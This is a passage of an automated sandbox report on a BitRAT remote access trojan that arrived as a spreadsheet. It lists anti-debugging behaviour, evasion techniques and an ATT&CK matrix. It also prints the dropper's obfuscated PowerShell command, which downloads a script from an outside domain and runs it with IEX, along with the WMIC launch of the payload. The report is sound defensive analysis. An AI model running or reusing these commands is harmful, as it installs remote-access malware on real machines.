      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.drBinary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
      Source: ModuleAnalysisCache.3.drBinary or memory string: Get-VMNetworkAdapterExtendedAcl
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,0000000029_2_00478772
      Hides threads from debuggersShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0058E501 IsDebuggerPresent,OutputDebugStringW,29_2_0058E501
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,29_2_007D5210
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_004252D0 mov eax, dword ptr fs:[00000030h]27_2_004252D0
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424F75 mov eax, dword ptr fs:[00000030h]27_2_00424F75
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424FD2 mov eax, dword ptr fs:[00000030h]27_2_00424FD2
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424FE7 mov eax, dword ptr fs:[00000030h]27_2_00424FE7
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_00424FFB mov eax, dword ptr fs:[00000030h]27_2_00424FFB
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_022100C7 mov eax, dword ptr fs:[00000030h]27_2_022100C7
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02211133 mov ecx, dword ptr fs:[00000030h]27_2_02211133
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210C36 mov eax, dword ptr fs:[00000030h]27_2_02210C36
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210B3A mov eax, dword ptr fs:[00000030h]27_2_02210B3A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h]27_2_0221093A
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210A3C mov eax, dword ptr fs:[00000030h]27_2_02210A3C
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210704 mov ecx, dword ptr fs:[00000030h]27_2_02210704
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210B06 mov eax, dword ptr fs:[00000030h]27_2_02210B06
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210C06 mov eax, dword ptr fs:[00000030h]27_2_02210C06
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210A08 mov eax, dword ptr fs:[00000030h]27_2_02210A08
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210D17 mov eax, dword ptr fs:[00000030h]27_2_02210D17
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221096C mov eax, dword ptr fs:[00000030h]27_2_0221096C
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210B6E mov eax, dword ptr fs:[00000030h]27_2_02210B6E
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210A70 mov eax, dword ptr fs:[00000030h]27_2_02210A70
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210C4B mov ecx, dword ptr fs:[00000030h]27_2_02210C4B
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_0221115B mov ecx, dword ptr fs:[00000030h]27_2_0221115B
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_022109A0 mov eax, dword ptr fs:[00000030h]27_2_022109A0
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210BA2 mov eax, dword ptr fs:[00000030h]27_2_02210BA2
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210EA2 mov ebx, dword ptr fs:[00000030h]27_2_02210EA2
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210EA2 mov edx, dword ptr fs:[00000030h]27_2_02210EA2
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210AA4 mov eax, dword ptr fs:[00000030h]27_2_02210AA4
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210698 mov eax, dword ptr fs:[00000030h]27_2_02210698
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210CD5 mov ecx, dword ptr fs:[00000030h]27_2_02210CD5
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210AD5 mov eax, dword ptr fs:[00000030h]27_2_02210AD5
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_022109D4 mov eax, dword ptr fs:[00000030h]27_2_022109D4
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 27_2_02210BD6 mov eax, dword ptr fs:[00000030h]27_2_02210BD6
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0069B53C mov eax, dword ptr fs:[00000030h]29_2_0069B53C
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004AABEB GetProcessHeap,HeapFree,29_2_004AABEB
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_006814DA
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0068B781

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\Test3.jpg protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpgJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpgJump to behavior
      Source: Yara matchFile source: Scanned_25526662-Payment.xls, type: SAMPLE
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: Test3.jpg, 0000001D.00000003.488792166.00000000035B4000.00000004.00000001.sdmpBinary or memory string: Program Manager]
      Source: Test3.jpg, 0000001D.00000003.470470282.00000000035B4000.00000004.00000001.sdmpBinary or memory string: Program ManagerY
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_0040EA7D cpuid 29_2_0040EA7D
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: GetLocaleInfoW,29_2_0058E1F1
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: ___crtGetLocaleInfoEx,29_2_0058E2F3
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: GetLocaleInfoW,29_2_006A2367
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,29_2_006AABFF
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: EnumSystemLocalesW,29_2_006AAE77
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: EnumSystemLocalesW,29_2_006AAEC2
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: EnumSystemLocalesW,29_2_006AAF5D
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,29_2_006AB363
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,29_2_006AB537
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: EnumSystemLocalesW,29_2_006A1DE7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpgCode function: 29_2_004139F1 __EH_prolog,GetSystemTimes,GetCurrentProcess,GetProcessTimes,GetTickCount64,29_2_004139F1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected BitRATShow sources
      Source: Yara matchFile source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected BitRATShow sources
      Source: Yara matchFile source: Process Memory Space: Test3.jpg PID: 3180, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting11Boot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerSystem Information Discovery36SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsExploitation for Client Execution13Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsSecurity Software Discovery331SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
